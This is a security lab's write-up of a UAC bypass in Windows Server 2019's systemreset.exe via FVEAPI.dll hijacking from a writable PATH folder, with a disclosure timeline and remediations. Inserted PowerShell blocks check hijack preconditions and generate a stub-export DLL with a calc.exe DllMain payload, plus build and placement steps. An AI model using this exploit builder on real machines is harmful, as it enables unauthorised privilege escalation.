ACTIVELabs
Powered by ACTIVECYBER, LLC

UAC Bypass in System Reset Binary via DLL Hijacking

4/10/2019

To continue our journey in the realm of bypassing UAC (see previous work here), we decided to investigate Windows Server 2019. Please note this blog post is not a UAC primer; if you need to learn more about the subject, we think Wikipedia is a good place to start. The following is the process used to find a new UAC bypass in the systemreset.exe binary using the DLL hijacking method. The technique was tested on Windows Server 2019 Version 1809 (OS Build 17763.404) and is still valid as of this writing.
Examining the manifest embedded in systemreset.exe shows that the binary's "autoElevate" property is set to true. Under the default UAC setting, a Microsoft-signed binary with this property that lives in a secure location is elevated to high integrity without a consent prompt when a member of the Administrators group runs it:
So we set up Procmon64.exe with the following self-explanatory filters:
We then let it run while executing systemreset.exe and quickly noticed that the binary tries to load FVEAPI.dll from a user-controlled folder, in a high-integrity context, because that folder is on the PATH variable. PATH is the last place the loader looks, after the application directory, the system directories and the current directory, so the search only reaches the user-controlled folder because no FVEAPI.dll is found in any of those earlier locations:
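As an added check (not part of the original post), the following PowerShell enumerates the two preconditions this hijack relies on: whether the DLL name already resolves from a directory the loader searches before PATH, and which PATH entries the current user can write to. Run it from an un-elevated (medium-integrity) shell, since that is the context an attacker would be writing from. The DLL name and application directory are parameters; nothing here is taken from the post's tooling.

```powershell
# Added example (not from the original post): report the DLL search-order
# preconditions for a PATH-based hijack of a given DLL name.
param(
    [string]$DllName = 'FVEAPI.dll',
    [string]$AppDir  = "$env:SystemRoot\System32"   # directory of systemreset.exe
)

function Test-DirectoryWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    # Creating and deleting a probe file is the only reliable writability test;
    # ACL inspection misses deny ACEs and integrity-level restrictions.
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

# Locations consulted before PATH under the default SafeDllSearchMode.
$searchedFirst = @(
    $AppDir,
    "$env:SystemRoot\System32",
    "$env:SystemRoot\System",
    $env:SystemRoot,
    (Get-Location).Path
)
$found = $searchedFirst | Where-Object { Test-Path -LiteralPath (Join-Path $_ $DllName) }
if ($found) {
    Write-Host "$DllName already resolves before PATH is consulted:"
    $found | ForEach-Object { Write-Host "  $_" }
} else {
    Write-Host "$DllName not found in any pre-PATH location; PATH entries are reachable."
}

# PATH is searched left to right, so a writable entry only matters if no
# earlier entry already contains the DLL.
$env:PATH -split ';' | Where-Object { $_ } | Select-Object -Unique | ForEach-Object {
    [pscustomobject]@{
        Directory = $_
        Writable  = Test-DirectoryWritable $_
        HasDll    = Test-Path -LiteralPath (Join-Path $_ $DllName)
    }
} | Format-Table -AutoSize
```

A row with Writable set to true that precedes every row with HasDll set to true is the condition the post exploits; the same table, run as a standard user, is what a defender would check when deciding whether PATH hardening is needed on a host.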
We built a relatively simple DLL whose PoppingCalc() function spawns calc.exe; DllMain invokes it when the DLL is loaded, and we used rundll32.exe to test it:
Executing the target binary with the newly created DLL in place now shows the following error message:
As the error message suggests, ResetEngine.dll failed to locate the FveGetStatus() function in FVEAPI.dll: our DLL was found and loaded, but it did not export that name. Using this information, we identified the full list of functions ResetEngine.dll requires from FVEAPI.dll via its import table:
We updated FVEAPI.dll with the missing exports and then confirmed they were present with dumpbin.exe. The full proof-of-concept code can be found here.
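The export-discovery and stub-building steps above, as an added example that is not the post's proof-of-concept code: a PowerShell script that reads the output of `dumpbin /imports ResetEngine.dll`, collects every name imported from FVEAPI.dll, and writes a C source file exporting a no-op function for each name with the calc.exe payload in DllMain. The embedded dumpbin excerpt is constructed for the example; FveGetStatus is the only export name taken from the post, and FvePlaceholderExport is a placeholder, not a real FVEAPI export.

```powershell
# Added example (not the post's PoC): generate a stub DLL source whose export
# table satisfies every import ResetEngine.dll takes from the target DLL.
param(
    [string]$DumpbinOutput,                 # saved `dumpbin /imports` output; empty -> sample below
    [string]$TargetDll = 'FVEAPI.dll',
    [string]$OutFile   = 'fveapi_stub.c'
)

# Constructed sample in dumpbin's layout. FvePlaceholderExport is fictitious.
$sample = @'
Dump of file ResetEngine.dll

File Type: DLL

  Section contains the following imports:

    FVEAPI.dll
                 180000000 Import Address Table
                 180000100 Import Name Table
                         0 time date stamp
                         0 Index of first forwarder reference

                           1A FveGetStatus
                           1B FvePlaceholderExport

    KERNEL32.dll
                 180000200 Import Address Table
                 180000300 Import Name Table
                         0 time date stamp
                         0 Index of first forwarder reference

                           2C CreateFileW
'@

function Get-ImportsFromDll {
    param([string[]]$Lines, [string]$DllName)
    $names   = [System.Collections.Generic.List[string]]::new()
    $inBlock = $false
    foreach ($line in $Lines) {
        # A module header is an indented line holding only the module file name.
        if ($line -match '^\s+(\S+\.dll)\s*$') {
            $inBlock = ($Matches[1] -ieq $DllName)
            continue
        }
        if (-not $inBlock) { continue }
        # Import entries are "<hex hint> <name>"; the table-address and
        # timestamp lines contain several words and do not match.
        if ($line -match '^\s+[0-9A-Fa-f]+\s+(\w+)\s*$') {
            $names.Add($Matches[1])
        }
    }
    return $names
}

$lines   = if ($DumpbinOutput) { Get-Content -LiteralPath $DumpbinOutput } else { $sample -split "`r?`n" }
$imports = Get-ImportsFromDll -Lines $lines -DllName $TargetDll
if ($imports.Count -eq 0) { throw "No imports from $TargetDll found in the dumpbin output." }

# Each import becomes a no-op export. The payload runs from DllMain at load time,
# before ResetEngine.dll calls any of these, so the bodies never need to be
# correct; the host process may misbehave afterwards because the signatures are wrong.
$stubs  = $imports | ForEach-Object { "__declspec(dllexport) void $_(void) {}" }
$source = @"
#include <windows.h>

$($stubs -join "`n")

/* Payload: executes inside the high-integrity systemreset.exe when the DLL loads. */
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        STARTUPINFOW si = { sizeof(si) };
        PROCESS_INFORMATION pi;
        WCHAR cmd[] = L"calc.exe";
        if (CreateProcessW(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }
    }
    return TRUE;
}
"@
Set-Content -LiteralPath $OutFile -Value $source -Encoding ASCII
Write-Host "Wrote $OutFile with $($imports.Count) stub export(s): $($imports -join ', ')"
```

Compile from an x64 Native Tools prompt with `cl /LD fveapi_stub.c /Fe:FVEAPI.dll`, then run `dumpbin /exports FVEAPI.dll` to confirm every name is present before placing the DLL in the writable PATH directory. Spawning a process from DllMain while the loader lock is held works in practice but goes against Microsoft's DllMain guidance; a sturdier payload would defer the work to after the load completes.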
Here is the demo:
We reported this to MSRC; as the disclosure timeline below records, MSRC responded that it does not service UAC bypasses and considers the matter resolved.
This particular technique can be remediated by setting the UAC level to "Always Notify" (at that level auto-elevation is not honored, so systemreset.exe prompts like any other elevation) or by taking away local administrative rights, since, as with any UAC bypass, the user must already be a member of the local Administrators group and the bypass only lifts their session from medium to high integrity. Removing standard-user write access to directories on PATH closes this specific hijack as well. We hope you've learned something from this blog post and feel free to reach out at labs@activecyber.us if you have any questions.

Disclosure Timeline
  • 03-28-19: Report sent to MSRC
  • 03-28-19: MSRC acknowledged report and case manager was assigned
  • 04-01-19: MSRC responded stating they do not service UAC bypasses and consider the matter resolved
  • 04-10-19: Blog post released